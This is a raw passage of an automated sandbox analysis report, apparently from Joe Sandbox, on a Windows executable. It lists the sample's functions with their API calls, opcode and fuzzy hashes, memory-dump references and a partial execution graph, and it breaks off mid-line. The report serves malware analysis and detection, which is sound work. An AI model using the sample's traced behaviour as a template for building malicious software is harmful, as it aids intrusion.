                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          • Opcode ID: a43e38c5c5d028c144d3e8cb6c32465874376830a1d5fb65c484278b2941d380
                                          • Instruction ID: 234dd49fbe87c6ca2bccb5c469feb3bcb330d3ea89130add922d392c3e6857ad
                                          • Opcode Fuzzy Hash: a43e38c5c5d028c144d3e8cb6c32465874376830a1d5fb65c484278b2941d380
                                          • Instruction Fuzzy Hash: 2051D371941219EBCF219F95CC46EEFBF74FF49710F10851AF514A2290D33899A2CBAA
                                          Function 004188A6 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,?,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004188E5
                                          • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?,?,?,00000000,00000001), ref: 004188FF
                                          • GetStringTypeA.KERNEL32(?,?,?,00000000,00200020,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 00418933
                                          • MultiByteToWideChar.KERNEL32(0041B122,00000002,?,00000000,00000000,00000000,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 0041896B
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 004189C1
                                          • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 004189D3
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          • Opcode ID: b6fc29cc1fe91b7363b8991f027c7948fc37d024faef256876d7a34b7c7ad979
                                          • Instruction ID: 45773244ba3084bfe591248ee5288dd1411f43dfdcda665af45e3c3989b1d248
                                          • Opcode Fuzzy Hash: b6fc29cc1fe91b7363b8991f027c7948fc37d024faef256876d7a34b7c7ad979
                                          • Instruction Fuzzy Hash: BA417BB2600219AFCF208F95DC86AEF7B79FB08750F10492AF911D2250C77989918B9A
                                          Function 004174ED Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExA.KERNEL32 ref: 0041750C
                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00417541
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004175A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                          • API String ID: 1385375860-4131005785
                                          • Opcode ID: 3eaa5e944d136b0007a8d9a645e7be42f59fb39eb476563cdd890dddd771b81e
                                          • Instruction ID: 85bddbf609848ad88969b96e0ec2a342a30041935dc8ecfc60b45b29f21cca6b
                                          • Opcode Fuzzy Hash: 3eaa5e944d136b0007a8d9a645e7be42f59fb39eb476563cdd890dddd771b81e
                                          • Instruction Fuzzy Hash: F4317B7184E2587DEB3186746C55BEF3B798B02354F2404DBD189C6242E63C9EC6CB1D
                                          Function 004126E0 Relevance: 7.6, APIs: 5, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsValidSecurityDescriptor.ADVAPI32(?,00000000,00000000,?,00000000,0040FA5A,?,?,00000000), ref: 00412726
                                            • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • GetSecurityDescriptorControl.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,74DEE010), ref: 00412747
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ControlCreateMutexValid
                                          • String ID:
                                          • API String ID: 5382943-0
                                          • Opcode ID: 7a40a00d7cc83c6fb11208a9676cb8a6778e7d7d4183abda0f0fc39d63e3b559
                                          • Instruction ID: ce17b90b339484897982068a113a1875571977018ad8679ec67858a3e104fd9b
                                          • Opcode Fuzzy Hash: 7a40a00d7cc83c6fb11208a9676cb8a6778e7d7d4183abda0f0fc39d63e3b559
                                          • Instruction Fuzzy Hash: 434116363043014BE720DF69EE84BE7B7D4EBC0764F54082EED64C7390D6B9E85986A5
                                          Function 0041831D Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 27memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • VirtualFree.KERNEL32(000000FF,00000000,00008000,hB,0041841D,hB,74DEDFF0,?,00000000,?,?,004184CF,00000010,00413378,?,?), ref: 0041832C
                                          • HeapFree.KERNEL32(00000000,?,?,004184CF,00000010,00413378,?,?), ref: 00418362
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Free$HeapVirtual
                                          • String ID: hB$hB$hB
                                          • API String ID: 3783212868-3407773006
                                          • Opcode ID: ac2766d890ba760c26cec665f9c93e8237cd86e774a741f4bb10f7a7867d9e1f
                                          • Instruction ID: f7fd38735fced4e952862f77377cc11919846e26e52132b364c2a56e16ac4255
                                          • Opcode Fuzzy Hash: ac2766d890ba760c26cec665f9c93e8237cd86e774a741f4bb10f7a7867d9e1f
                                          • Instruction Fuzzy Hash: 3DF03A74601310DFC3249F18EC84B967BF0FB08B10B21842DE5A5573A0C771AC81CB48
                                          Function 00412A38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetConsoleCtrlHandler.KERNEL32(00412B44,00000001,?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014), ref: 00412AC8
                                          • GetLastError.KERNEL32(?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014,?,?), ref: 00412AF7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ConsoleCtrlErrorHandlerLast
                                          • String ID: v@$v@
                                          • API String ID: 3113525192-2252294108
                                          • Opcode ID: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                          • Instruction ID: 36fa8ff7c152ed876fc65d5f67174a495ff5afcdeb0d815e8b9c8bd107a64320
                                          • Opcode Fuzzy Hash: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                          • Instruction Fuzzy Hash: EE219131A155108B8A398F08DA885EAB762ABA1350799422BC805C73B0D6F86CE6C78D
                                          Function 00414564 Relevance: 6.5, APIs: 5, Instructions: 246COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                          • Instruction ID: 459714ddabeffe01b96583aa82163a16ed5fdc408948e7cab0404e7047e2aba0
                                          • Opcode Fuzzy Hash: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                          • Instruction Fuzzy Hash: F57116365002106BDB226A65CC40BEF3A25EBD27A8F250127FC289A2D0DB3DDDC1969C
                                          Function 0041CF38 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000), ref: 0041CF0C
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                          • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$CompareString
                                          • String ID:
                                          • API String ID: 376665442-0
                                          • Opcode ID: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                          • Instruction ID: 9864fccd20358ca3471ff816892f761ab08e69d42232d9cc94e5ed20e2ccf262
                                          • Opcode Fuzzy Hash: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                          • Instruction Fuzzy Hash: A821D572900259EBCF228F96CC85DDFBF76FF89750F24811AF91061260D33A8961EB64
                                          Function 0041ACD3 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                          • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$CompareString
                                          • String ID:
                                          • API String ID: 376665442-0
                                          • Opcode ID: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                          • Instruction ID: 96f580f69b9e3dcf2c1ef1fcae33e3ea1998bfe1201ed0f81b595f9675030ecf
                                          • Opcode Fuzzy Hash: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                          • Instruction Fuzzy Hash: DD212932D01659EBCF218FD5DC459DEBFB6FF48360F10412AFA10622A0C3369962DB96
                                          Function 00415471 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(?,00000000), ref: 00415485
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID: $
                                          • API String ID: 1807457897-3032137957
                                          • Opcode ID: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                          • Instruction ID: 0d18aeb077521f4644a221a408f67d066500747ada27a7292fb7ec63da0fa870
                                          • Opcode Fuzzy Hash: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                          • Instruction Fuzzy Hash: 0D419C31144698AFEB258B14CD49BFB3FABEB45704F1410E6D189C7252C23D49D8CBAB
                                          Function 0040FB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DosDateTimeToFileTime.KERNEL32(4F020EB0,4F020EB0,?), ref: 0040FC80
                                          • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040F775,?,?,?), ref: 0040FC90
                                            • Part of subcall function 0040FCE0: SystemTimeToFileTime.KERNEL32(?,?,00000000,?,?,0040FC29,?,?,00000001), ref: 0040FD9F
                                            • Part of subcall function 0040FCE0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040FC29,?,?,00000001), ref: 0040FDAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Time$File$Local$DateSystem
                                          • String ID: nircmdc.exe
                                          • API String ID: 906138043-3082794360
                                          • Opcode ID: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                          • Instruction ID: 5baf95fb76d08c68963974afa87817b976a97d3decfcf36862cfafa69845cedb
                                          • Opcode Fuzzy Hash: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                          • Instruction Fuzzy Hash: 353184B99583045BE224DB14DC46A6773E8FB88704F04493DFD4467391D279ED09CBAA
                                          Function 00402660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharToOemA.USER32(00000000,00000000), ref: 004026A9
                                          • OemToCharA.USER32(00000000,00000000), ref: 004026C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Char
                                          • String ID: %@
                                          • API String ID: 751630497-2048787947
                                          • Opcode ID: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                          • Instruction ID: b3c2b64b661b7efdf6035ac58ec0d7cccb6eb28b1d05d5fc9c221f85c97273e9
                                          • Opcode Fuzzy Hash: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                          • Instruction Fuzzy Hash: 7201F77B50111033CA1057767D4A89B3B68EAC13727184A3AFD19973D2EABEDC0193B9
                                          Function 00411B10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDriveTypeA.KERNEL32(-00000060,0041179E,-00000060,?,00000000), ref: 00411B2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: DriveType
                                          • String ID: /$:
                                          • API String ID: 338552980-4222935259
                                          • Opcode ID: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                          • Instruction ID: a07ccfaa741e44cdb586d8d66076ba6bd627a13065fdecee1af11a2a6ee7f3a9
                                          • Opcode Fuzzy Hash: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                          • Instruction Fuzzy Hash: DAD0175520C3C1ADE3068738855839EBFD24FE6248F08C89CF0CD46197C274868AD32B
                                          Function 00417D37 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D5F
                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D93
                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DAD
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DC4
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AllocHeap$FreeVirtual
                                          • String ID:
                                          • API String ID: 3499195154-0
                                          • Opcode ID: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                          • Instruction ID: 19d746281750a9b93ecae615901eefe1d66095e7a60d7e67be2a35289f352c6c
                                          • Opcode Fuzzy Hash: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                          • Instruction Fuzzy Hash: 9811CE74240300AFC335CF19EC88AA27BB2FB98314710493DF2A2C31B0D3759966DB5A

                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:33
                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 